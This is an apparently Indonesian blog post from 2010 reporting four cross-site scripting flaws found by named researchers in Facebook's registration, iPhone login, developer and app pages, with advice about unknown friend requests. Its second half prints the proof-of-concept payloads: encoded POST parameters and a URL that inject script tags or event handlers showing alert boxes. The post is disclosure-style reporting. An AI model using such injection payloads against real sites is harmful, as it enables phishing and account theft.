Laman


Search Box

17.11.10

Empat kelemahan XSS yang cukup kritis ditemukan di Facebook


Para pengguna Facebook rentan akan serangan phishing dan pencurian ID dikarenakan munculnya kelemahan cross-site scripting yang terbaru dan cukup kritis.
Peneliti keamanan Zeitjak, David Wharton, Daimon dan p3lo baru-baru ini menemukan cacat XSS yang berpengaruh terhadap beberapa fungsionalitas Facebook termasuk halaman developer, halaman registrasi pengguna baru, halaman login iphone dan halaman aplikasi.
Orang-orang jahat dapat mengeksploitasi bugs XSS ini untuk menginfeksi jutaan anggota Facebook dengan malware, adware dan spyware.
Biar aman, anda dianjurkan untuk tidak menerima friend invitation dari orang yang tidak anda kenal. Alasannya adalah bahwa profil di Facebook berisikan informasi pribadi yang cukup berharga untuk dipelajari oleh fraudster (teman anda yang tidak dikenal). Para teman yang tak 'diundang' ini bertujuan untuk melancarkan serangan phishing atau menyebarkan malware pada pengguna individual maupun bisnis. Bagaimana jika anda mengklik sebuah shared link atau apapun? Maka siap-siap saja privasi anda akan menjadi milik mereka!!!
Berikut ini keempat cacat XSS yang ditemukan, untuk mengetahui seperti apa cacatnya klik link bertuliskan Mirror:
XSS #1 dengan POST (oleh Zeitjak) | Mirror:
POST: reg_email__="onmouseover="alert('XSS - ZJ')"foo="bar
XSS #2 dengan POST (oleh David Wharton) | Mirror:
POST:
email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login
XSS #3 (oleh DaiMon) | Mirror:
http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E
This one works on another IP (67.228.87.82) and can't be used for a worm, except a phishing one.
XSS #4 dengan POST (oleh p3lo) | Mirror:
POST:
profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=

No comments: